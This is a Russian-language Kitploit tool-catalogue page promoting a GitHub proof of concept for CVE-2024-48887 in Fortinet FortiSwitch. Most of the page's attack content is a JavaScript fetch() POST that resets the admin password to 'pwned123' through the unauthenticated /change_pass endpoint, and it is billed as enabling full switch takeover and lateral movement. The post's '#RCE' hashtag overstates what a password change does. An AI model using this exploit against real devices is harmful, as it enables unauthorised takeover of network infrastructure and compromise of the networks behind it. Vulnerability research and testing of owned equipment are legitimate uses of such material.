Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-48887-FortiSwitch-Exploit — легковесный фрагмент JavaScript, демонстрирующий, как можно инициировать несанкционированное изменение пароля через уязвимые конечные точки GUI Fortinet FortiSwitch. | Kitploit
Инструменты/GitHubGitHub/cybersecplayground/cve-2024-48887-fortiswitch-exploit
Анализ уязвимостейЭксплуатацияЛатеральное перемещениеЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubcybersecplayground/cve-2024-48887-fortiswitch-exploit

CVE-2024-48887-FortiSwitch-Exploit

легковесный фрагмент JavaScript, демонстрирующий, как можно инициировать несанкционированное изменение пароля через уязвимые конечные точки GUI Fortinet FortiSwitch.

Репозиторий
231 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-48887-FortiSwitch-Exploit

🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨

🔥 Только что выложил легковесный JavaScript-сниппет, демонстрирующий, как можно вызвать несанкционированную смену пароля на уязвимых конечных точках GUI Fortinet FortiSwitch.

🛠️ Об уязвимости: Атакующий может отправить простой fetch()-запрос для изменения параметров пароля без какой-либо аутентификации, напрямую обращаясь к вариантам конечной точки /change_pass.

root@kitploit:~
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));

💡 Воздействие: полный захват коммутатора, потенциальное боковое перемещение и компрометация сети.

📁 Репозиторий: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Поставьте звезду репозиторию и поделитесь им с коллегами по инфобезопасности!

📢 Следите за полным разбором и оповещениями в реальном времени через @cybersecplayground

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

Скачать инструмент